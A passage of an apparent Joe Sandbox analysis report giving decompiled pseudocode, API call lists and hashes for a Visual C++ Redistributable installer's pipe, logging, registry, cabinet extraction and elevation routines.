                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Message$CurrentPeekThread
                                                                          • String ID: Failed to create user for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$user.cpp$wininet.dll
                                                                          • API String ID: 673430819-2573580774
                                                                          • Opcode ID: 76c173f8752444a693e7d65175fa32be5de0fcae3bad08c1e62e4e7355528294
                                                                          • Instruction ID: b899366070e2223f8d9c317bd9457f2f65428db9fe70d800638025213abb9cf3
                                                                          • Opcode Fuzzy Hash: 76c173f8752444a693e7d65175fa32be5de0fcae3bad08c1e62e4e7355528294
                                                                          • Instruction Fuzzy Hash: 6241B171644619BFE7249BA4CC85EFEB3ACEF05314F100125FA05EB652EF20EE0597A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 54%
                                                                          			E000C473A(void* _a4, signed int* _a8) {
                                                                          				long _v8;
                                                                          				signed int _v12;
                                                                          				signed int _v16;
                                                                          				void* _t26;
                                                                          				int _t30;
                                                                          				long _t31;
                                                                          				void* _t34;
                                                                          				int _t35;
                                                                          				signed short _t41;
                                                                          				void* _t43;
                                                                          				signed int _t44;
                                                                          				signed int* _t48;
                                                                          				signed int _t49;
                                                                          
                                                                          				_t49 = 0;
                                                                          				_v16 = _v16 & 0;
                                                                          				_v12 = _v12 & 0;
                                                                          				_v8 = _v8 & 0;
                                                                          				_t43 = 0;
                                                                          				do {
                                                                          					_push(0);
                                                                          					_push( &_v8);
                                                                          					_t26 = 8;
                                                                          					_t30 = ReadFile(_a4,  &_v16 + _t43, _t26 - _t43, ??, ??); // executed
                                                                          					_t48 = _a8;
                                                                          					if(_t30 != 0) {
                                                                          						goto L6;
                                                                          					} else {
                                                                          						_t41 = GetLastError();
                                                                          						if(_t41 != 0xea) {
                                                                          							if(_t41 == 0x6d) {
                                                                          								_t44 = 0;
                                                                          								_t31 = 0;
                                                                          								_v16 = 0;
                                                                          								_v12 = 0;
                                                                          								_t49 = 1;
                                                                          								L8:
                                                                          								 *_t48 = _t44;
                                                                          								_t48[1] = _t31;
                                                                          								if(_t31 != 0) {
                                                                          									_t34 = E000B38D4(_t31, 0);
                                                                          									_t48[3] = _t34;
                                                                          									if(_t34 != 0) {
                                                                          										_t35 = ReadFile(_a4, _t34, _t48[1],  &_v8, 0); // executed
                                                                          										if(_t35 != 0) {
                                                                          											_t48[2] = 1;
                                                                          										} else {
                                                                          											_t53 =  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
                                                                          											_t49 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
                                                                          											E000B37D3(0x80004005, "pipe.cpp", 0x327, _t49);
                                                                          											_push("Failed to read data for message.");
                                                                          											goto L12;
                                                                          										}
                                                                          									} else {
                                                                          										_t49 = 0x8007000e;
                                                                          										E000B37D3(_t34, "pipe.cpp", 0x323, 0x8007000e);
                                                                          										_push("Failed to allocate data for message.");
                                                                          										goto L12;
                                                                          									}
                                                                          								}
                                                                          							} else {
                                                                          								_t49 =  <=  ? _t41 : _t41 & 0x0000ffff | 0x80070000;
                                                                          								if(_t49 < 0) {
                                                                          									E000B37D3(_t41, "pipe.cpp", 0x318, _t49);
                                                                          									_push("Failed to read message from pipe.");
                                                                          									L12:
                                                                          									_push(_t49);
                                                                          									E000F012F();
                                                                          								} else {
                                                                          									goto L6;
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t49 = 0;
                                                                          							goto L6;
                                                                          						}
                                                                          					}
                                                                          					if(_t48[2] == 0 && _t48[3] != 0) {
                                                                          						E000B3999(_t48[3]);
                                                                          					}
                                                                          					return _t49;
                                                                          					L6:
                                                                          					_t43 = _t43 + _v8;
                                                                          				} while (_t43 < 8);
                                                                          				_t31 = _v12;
                                                                          				_t44 = _v16;
                                                                          				goto L8;
                                                                          			}

















                                                                          APIs
                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000008,?,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000001,00000000), ref: 000C4765
                                                                          • GetLastError.KERNEL32 ref: 000C4772
                                                                          • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,?,00000000), ref: 000C481B
                                                                          • GetLastError.KERNEL32 ref: 000C4825
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastRead
                                                                          • String ID: @Met$Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$pipe.cpp
                                                                          • API String ID: 1948546556-3410827865
                                                                          • Opcode ID: 95cf572f5c27c510cf53556319679dbbd0963792086e4b6869ad537b4ee3cb4d
                                                                          • Instruction ID: 2c93a33330cb5ca82fb3c9c27235c06e0f008edd9d1dc9f541780eb40a05ea77
                                                                          • Opcode Fuzzy Hash: 95cf572f5c27c510cf53556319679dbbd0963792086e4b6869ad537b4ee3cb4d
                                                                          • Instruction Fuzzy Hash: AD31E971A44225BBE7209F65DC55FAEB7A8FF05711F108229F804E6581EB74DE048BD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 38%
                                                                          			E000C67B0(void* __ecx, void* _a4) {
                                                                          				long _v8;
                                                                          				int _t12;
                                                                          
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				if(WaitForSingleObject(_a4, 0xffffffff) == 0) {
                                                                          					_t12 = GetExitCodeThread(_a4,  &_v8); // executed
                                                                          					if(_t12 == 0) {
                                                                          						_t24 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          						_t25 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          						_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          						E000B37D3(0x80004005, "core.cpp", 0x630, _t25);
                                                                          						_push("Failed to get cache thread exit code.");
                                                                          						goto L4;
                                                                          					}
                                                                          				} else {
                                                                          					_t30 =  <=  ? GetLastError() : _t18 & 0x0000ffff | 0x80070000;
                                                                          					_t31 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t18 & 0x0000ffff | 0x80070000;
                                                                          					_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t18 & 0x0000ffff | 0x80070000;
                                                                          					E000B37D3(0x80004005, "core.cpp", 0x62b, _t31);
                                                                          					_push("Failed to wait for cache thread to terminate.");
                                                                          					L4:
                                                                          					_push(_v8);
                                                                          					E000F012F();
                                                                          				}
                                                                          				return _v8;
                                                                          			}






                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,000C6CFB,000B4740,?,00000000,?,00000000,00000001), ref: 000C67BD
                                                                          • GetLastError.KERNEL32(?,000C6CFB,000B4740,?,00000000,?,00000000,00000001), ref: 000C67C7
                                                                          • GetExitCodeThread.KERNELBASE(00000001,00000000,?,000C6CFB,000B4740,?,00000000,?,00000000,00000001), ref: 000C6806
                                                                          • GetLastError.KERNEL32(?,000C6CFB,000B4740,?,00000000,?,00000000,00000001), ref: 000C6810
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                          • String ID: @Met$Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
                                                                          • API String ID: 3686190907-3423812259
                                                                          • Opcode ID: ae488efbb72d07d438dba61b08c3d02ef245eda4ec7706d5fe46525488a1e5cb
                                                                          • Instruction ID: 3ac1a7afe8c792feef6d8bcfcd80edce5812e030f2c3aea3f1281efa2825f1f6
                                                                          • Opcode Fuzzy Hash: ae488efbb72d07d438dba61b08c3d02ef245eda4ec7706d5fe46525488a1e5cb
                                                                          • Instruction Fuzzy Hash: E50180B0344304BBFB18ABA5DD56BBE76E5EF00710F20412DB946D55E0EB79DE00AA28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 87%
                                                                          			E000F041B(void* __ecx, void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                          				char _v8;
                                                                          				void* __ebx;
                                                                          				void* __esi;
                                                                          				intOrPtr* _t17;
                                                                          				void* _t24;
                                                                          				void* _t26;
                                                                          				intOrPtr _t27;
                                                                          				intOrPtr _t30;
                                                                          				void* _t36;
                                                                          				void* _t41;
                                                                          				void* _t42;
                                                                          				void* _t44;
                                                                          
                                                                          				_t42 = __edi;
                                                                          				_t41 = __edx;
                                                                          				_t40 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_v8 = 0;
                                                                          				EnterCriticalSection(0x11b60c);
                                                                          				_t17 = _a16;
                                                                          				if(_t17 == 0 ||  *_t17 == 0) {
                                                                          					_t44 = E000B2D79(_t40, _a4, _a8, 0x11b604);
                                                                          					if(_t44 < 0) {
                                                                          						goto L21;
                                                                          					}
                                                                          					_t44 = E000B3446(_t40,  *0x11b604,  &_v8);
                                                                          					if(_t44 < 0) {
                                                                          						goto L21;
                                                                          					}
                                                                          					_t44 = E000B4013(_v8, 0);
                                                                          					if(_t44 < 0) {
                                                                          						goto L21;
                                                                          					}
                                                                          					_push(0);
                                                                          					_push(0x80);
                                                                          					_t24 = 2;
                                                                          					_t40 = 4;
                                                                          					_t25 =  !=  ? _t40 : _t24;
                                                                          					_t26 = CreateFileW( *0x11b604, 0x40000000, 1, 0,  !=  ? _t40 : _t24, ??, ??);
                                                                          					 *0x11a774 = _t26;
                                                                          					if(_t26 != 0xffffffff) {
                                                                          						L11:
                                                                          						if(_a20 != 0) {
                                                                          							SetFilePointer(_t26, 0, 0, 2);
                                                                          						}
                                                                          						goto L13;
                                                                          					}
                                                                          					_t44 =  <=  ? GetLastError() : _t34 & 0x0000ffff | 0x80070000;
                                                                          					if(_t44 >= 0) {
                                                                          						_t26 =  *0x11a774; // 0xffffffff
                                                                          						goto L11;
                                                                          					}
                                                                          					E000B37D3(_t34, "logutil.cpp", 0x81, _t44);
                                                                          					goto L21;
                                                                          				} else {
                                                                          					_t36 = E000B2DE0(_t40, _a4, _a8, _a12, _t17, 0x11b604, 0x11a774); // executed
                                                                          					_t44 = _t36;
                                                                          					if(_t44 < 0) {
                                                                          						L21:
                                                                          						LeaveCriticalSection(0x11b60c);
                                                                          						if(_v8 != 0) {
                                                                          							E000F54EF(_v8);
                                                                          						}
                                                                          						return _t44;
                                                                          					} else {
                                                                          						L13:
                                                                          						if(_a24 != 0) {
                                                                          							E000F01F0(0, _t41, _t42, _t44);
                                                                          						}
                                                                          						_t27 =  *0x11b608; // 0x0
                                                                          						if(_t27 != 0) {
                                                                          							E000F0658(_t40, _t41, _t27);
                                                                          							_t30 =  *0x11b608; // 0x0
                                                                          							if(_t30 != 0) {
                                                                          								E000F54EF(_t30);
                                                                          								 *0x11b608 = 0;
                                                                          							}
                                                                          						}
                                                                          						if(_a28 == 0) {
                                                                          							L20:
                                                                          							 *0x11b634 = 0;
                                                                          							goto L21;
                                                                          						} else {
                                                                          							_t44 = E000B21A5(_a28,  *0x11b604, 0);
                                                                          							if(_t44 < 0) {
                                                                          								goto L21;
                                                                          							}
                                                                          							goto L20;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          			}
















                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(0011B60C,00000000,?,?,?,000B5407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 000F042B
                                                                          • CreateFileW.KERNEL32(40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,0011B604,?,000B5407,00000000,Setup), ref: 000F04CC
                                                                          • GetLastError.KERNEL32(?,000B5407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 000F04DC
                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,000B5407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 000F0515
                                                                            • Part of subcall function 000B2DE0: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 000B2F1F
                                                                          • LeaveCriticalSection.KERNEL32(0011B60C,?,?,0011B604,?,000B5407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 000F056E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                          • String ID: @Met$logutil.cpp
                                                                          • API String ID: 4111229724-637279948
                                                                          • Opcode ID: 4805e9063811539942664bb67bf2a42e35e9f91f1f9b4dcbc150cbd30e8864dd
                                                                          • Instruction ID: 14439887139115af0bf5ecf3f1a7f08edecceda48515f93ad150fd07cd14d110
                                                                          • Opcode Fuzzy Hash: 4805e9063811539942664bb67bf2a42e35e9f91f1f9b4dcbc150cbd30e8864dd
                                                                          • Instruction Fuzzy Hash: 5C31867190561DAFEB219F61DD85AFB3AB8EB10B51F004125FF00A6962D771CD90EB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 73%
                                                                          			E000BF69D(intOrPtr _a4, intOrPtr* _a8) {
                                                                          				void* _v8;
                                                                          				void* _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				void* _t35;
                                                                          				void* _t37;
                                                                          				void* _t46;
                                                                          				void* _t48;
                                                                          				void* _t50;
                                                                          				intOrPtr* _t53;
                                                                          				void* _t58;
                                                                          				void* _t65;
                                                                          				void* _t66;
                                                                          
                                                                          				_t61 = _a4;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_v20 = 0;
                                                                          				if(E000B1F20( &_v16, L"%ls.RebootRequired",  *((intOrPtr*)(_a4 + 0x50))) >= 0) {
                                                                          					_t35 = E000F0E3F( *((intOrPtr*)(_t61 + 0x4c)), _v16, 1,  &_v12); // executed
                                                                          					if(_t35 < 0) {
                                                                          						_t37 = E000F0E3F( *((intOrPtr*)(_t61 + 0x4c)),  *((intOrPtr*)(_t61 + 0x50)), 1,  &_v8); // executed
                                                                          						_t65 = _t37;
                                                                          						if(_t65 == 0x80070002 || _t65 == 0x80070003) {
                                                                          							 *_a8 = 0;
                                                                          							goto L23;
                                                                          						} else {
                                                                          							if(_t65 >= 0) {
                                                                          								_t66 = E000F0EEC(_t58, _v8, L"Resume",  &_v20);
                                                                          								if(_t66 != 0x80070002) {
                                                                          									if(_t66 >= 0) {
                                                                          										_t46 = _v20 - 1;
                                                                          										if(_t46 == 0) {
                                                                          											 *_a8 = 2;
                                                                          										} else {
                                                                          											_t48 = _t46 - 1;
                                                                          											if(_t48 == 0) {
                                                                          												 *_a8 = 5;
                                                                          											} else {
                                                                          												_t50 = _t48 - 1;
                                                                          												if(_t50 == 0) {
                                                                          													 *_a8 = 6;
                                                                          												} else {
                                                                          													_t53 = _a8;
                                                                          													if(_t50 == 1) {
                                                                          														 *_t53 = 4;
                                                                          													} else {
                                                                          														 *_t53 = 1;
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          										goto L24;
                                                                          									}
                                                                          									_push("Failed to read Resume value.");
                                                                          									goto L2;
                                                                          								}
                                                                          								 *_a8 = 1;
                                                                          								goto L23;
                                                                          							} else {
                                                                          								_push("Failed to open registration key.");
                                                                          								goto L2;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						 *_a8 = 3;
                                                                          						L23:
                                                                          						_t66 = 0;
                                                                          						goto L24;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to format pending restart registry key to read.");
                                                                          					L2:
                                                                          					_push(_t66);
                                                                          					E000F012F();
                                                                          					L24:
                                                                          					if(_v8 != 0) {
                                                                          						RegCloseKey(_v8);
                                                                          						_v8 = 0;
                                                                          					}
                                                                          					if(_v12 != 0) {
                                                                          						RegCloseKey(_v12);
                                                                          						_v12 = 0;
                                                                          					}
                                                                          					if(_v16 != 0) {
                                                                          						E000F54EF(_v16);
                                                                          					}
                                                                          					return _t66;
                                                                          				}
                                                                          			}

















                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 000BF7CD
                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 000BF7DA
                                                                          Strings
                                                                          • %ls.RebootRequired, xrefs: 000BF6BA
                                                                          • Failed to format pending restart registry key to read., xrefs: 000BF6D1
                                                                          • Failed to open registration key., xrefs: 000BF736
                                                                          • Resume, xrefs: 000BF741
                                                                          • Failed to read Resume value., xrefs: 000BF763
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                          • API String ID: 3535843008-3890505273
                                                                          • Opcode ID: a578cfe2a3eb8f2c6487b5bb0c94a2eb787473bcbeb236994b6aabeeb763585c
                                                                          • Instruction ID: ef1111a5924bdfed0a894e7fb09ac6dd1532d060a300255c7fba94baf8d084f2
                                                                          • Opcode Fuzzy Hash: a578cfe2a3eb8f2c6487b5bb0c94a2eb787473bcbeb236994b6aabeeb763585c
                                                                          • Instruction Fuzzy Hash: BF415F3698411AFFCB119F98CC81AFDBBB5FB05310F2581B6E914AB251CB769E40DB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 61%
                                                                          			E000D08F0(void* __ecx, void* _a8, long _a12) {
                                                                          				long _v8;
                                                                          				intOrPtr _t25;
                                                                          				int _t27;
                                                                          				signed short _t30;
                                                                          				intOrPtr _t41;
                                                                          				signed int _t44;
                                                                          				struct _OVERLAPPED* _t48;
                                                                          				long _t54;
                                                                          
                                                                          				_t44 =  *0x11aac0; // 0x0
                                                                          				_t48 = 0;
                                                                          				_v8 = 0;
                                                                          				_t41 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t44 * 4)) + 4));
                                                                          				_t25 =  *((intOrPtr*)(_t41 + 0x2c));
                                                                          				if(_t25 == 0) {
                                                                          					_t27 = WriteFile( *(_t41 + 0x3c), _a8, _a12,  &_v8, 0); // executed
                                                                          					if(_t27 == 0) {
                                                                          						_t30 = GetLastError();
                                                                          						_t52 =  <=  ? _t30 : _t30 & 0x0000ffff | 0x80070000;
                                                                          						_t48 =  >=  ? 0x80004005 :  <=  ? _t30 : _t30 & 0x0000ffff | 0x80070000;
                                                                          						E000B37D3(0x80004005, "cabextract.cpp", 0x304, _t48);
                                                                          						_push("Failed to write during cabinet extraction.");
                                                                          						goto L6;
                                                                          					}
                                                                          				} else {
                                                                          					if(_t25 == 1) {
                                                                          						_t54 = _a12;
                                                                          						E000D1664( *((intOrPtr*)(_t41 + 0x40)) +  *((intOrPtr*)(_t41 + 0x48)),  *((intOrPtr*)(_t41 + 0x44)) -  *((intOrPtr*)(_t41 + 0x48)), _a8, _t54);
                                                                          						 *((intOrPtr*)(_t41 + 0x48)) =  *((intOrPtr*)(_t41 + 0x48)) + _t54;
                                                                          						_v8 = _t54;
                                                                          					} else {
                                                                          						_t48 = 0x8007139f;
                                                                          						_push("Unexpected call to CabWrite().");
                                                                          						L6:
                                                                          						E000F012F();
                                                                          						_t44 = _t48;
                                                                          					}
                                                                          				}
                                                                          				 *((intOrPtr*)(_t41 + 0x30)) = _t48;
                                                                          				_t29 =  <  ? _t44 | 0xffffffff : _v8;
                                                                          				return  <  ? _t44 | 0xffffffff : _v8;
                                                                          			}












                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite_memcpy_s
                                                                          • String ID: @Met$Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                          • API String ID: 1970631241-130182655
                                                                          • Opcode ID: 35b11b2d58e52ca9caa6c319677e73224427dbd1b2a790f6b8d1710b24b48eef
                                                                          • Instruction ID: f380091bd6ce0ded971626f8ae0ba81aa1a10d84575ccf414a4a61e978ba9bb2
                                                                          • Opcode Fuzzy Hash: 35b11b2d58e52ca9caa6c319677e73224427dbd1b2a790f6b8d1710b24b48eef
                                                                          • Instruction Fuzzy Hash: 84218B76640304AFEB14DF6DDD84EAA77E9FF88720F11405AFA08C7256D771DA009B61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 76%
                                                                          			E000F076C(void* _a4, signed int* _a8) {
                                                                          				void* _v8;
                                                                          				void _v12;
                                                                          				long _v16;
                                                                          				int _t20;
                                                                          				signed short _t27;
                                                                          				long _t31;
                                                                          
                                                                          				_t31 = 0;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_v16 = 0;
                                                                          				if(OpenProcessToken(_a4, 8,  &_v8) != 0) {
                                                                          					_t20 = GetTokenInformation(_v8, 0x14,  &_v12, 4,  &_v16); // executed
                                                                          					if(_t20 == 0) {
                                                                          						_t31 =  <=  ? GetLastError() : 0x80004005 & 0x0000ffff | 0x80070000;
                                                                          						if(_t31 != 0x80070057) {
                                                                          							if(_t31 < 0) {
                                                                          								_push(_t31);
                                                                          								_push(0x35);
                                                                          								goto L8;
                                                                          							}
                                                                          						} else {
                                                                          							_t31 = 0;
                                                                          							 *_a8 = 0;
                                                                          						}
                                                                          					} else {
                                                                          						 *_a8 = 0 | _v12 != 0x00000000;
                                                                          					}
                                                                          				} else {
                                                                          					_t27 = GetLastError();
                                                                          					_t36 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
                                                                          					_t31 =  >=  ? 0x80004005 :  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
                                                                          					_push(_t31);
                                                                          					_push(0x21);
                                                                          					L8:
                                                                          					_push("procutil.cpp");
                                                                          					E000B37D3(0x80004005);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					FindCloseChangeNotification(_v8); // executed
                                                                          				}
                                                                          				return _t31;
                                                                          			}










                                                                          APIs
                                                                          • OpenProcessToken.ADVAPI32(?,00000008,?,?,?,?,?,?,?,000C8110,00000000), ref: 000F078A
                                                                          • GetLastError.KERNEL32(?,?,?,?,000C8110,00000000), ref: 000F0794
                                                                          • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,000C8110,00000000), ref: 000F07C6
                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,000C8110,00000000), ref: 000F081D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Token$ChangeCloseErrorFindInformationLastNotificationOpenProcess
                                                                          • String ID: @Met$procutil.cpp
                                                                          • API String ID: 2387526074-2144224329
                                                                          • Opcode ID: 566901e73a3ca9d561a6e3c8d0d7034b188f966ff1f5f15c92f9ee4f0ea7505a
                                                                          • Instruction ID: 955352e3a433470b59c6299c213d9f91f47a5c3e25499c483809c83b98d11f02
                                                                          • Opcode Fuzzy Hash: 566901e73a3ca9d561a6e3c8d0d7034b188f966ff1f5f15c92f9ee4f0ea7505a
                                                                          • Instruction Fuzzy Hash: C421C671E40228EBEB20AB95CC44AFEBBE8EF44750F114066EE15E7560DB308E01EBD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 22%
                                                                          			E000CD206(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				void* __ecx;
                                                                          				intOrPtr* _t18;
                                                                          				void* _t25;
                                                                          				void* _t27;
                                                                          				void* _t29;
                                                                          				void* _t43;
                                                                          				void* _t57;
                                                                          				intOrPtr _t58;
                                                                          				void* _t60;
                                                                          				void* _t61;
                                                                          				void* _t64;
                                                                          
                                                                          				_v8 = _v8 | 0xffffffff;
                                                                          				_t58 = _a4;
                                                                          				_t18 =  *((intOrPtr*)(_t58 + 0xc8));
                                                                          				_t61 = E000BD58B(_t58 + 0xb8, 1,  *((intOrPtr*)( *_t18 + 0x74))(_t18, _t57, _t60, _t43));
                                                                          				if(_t61 >= 0) {
                                                                          					_push(__ebx);
                                                                          					_t41 = _t58 + 0x4a0;
                                                                          					if(E000C4B96(_t58 + 0x4a0, __edx, _t58 + 0x4a0, _t58 + 0x4a4) >= 0) {
                                                                          						_t25 = E000C4CE8(_t41, 1,  &_v8); // executed
                                                                          						if(_t25 >= 0) {
                                                                          							_push(0x2000000a);
                                                                          							_push(2); // executed
                                                                          							E000B550F(); // executed
                                                                          							while(1) {
                                                                          								_t27 = E000C4ED2( *((intOrPtr*)(_t58 + 0x49c)), _t41, 1, _a8); // executed
                                                                          								_t64 = _t27;
                                                                          								if(_t64 >= 0) {
                                                                          									break;
                                                                          								}
                                                                          								if(_t64 != 0x800704c7) {
                                                                          									L13:
                                                                          									if(_t64 < 0) {
                                                                          										goto L14;
                                                                          									}
                                                                          								} else {
                                                                          									_t64 = 0x80070642;
                                                                          									if(E000BD742(0x80070642,  *((intOrPtr*)(_t58 + 0xc8)), 0, 0, 0x80070642, 0, 0x15, 0) == 4) {
                                                                          										continue;
                                                                          									} else {
                                                                          										L14:
                                                                          										_push("Failed to elevate.");
                                                                          										goto L16;
                                                                          									}
                                                                          								}
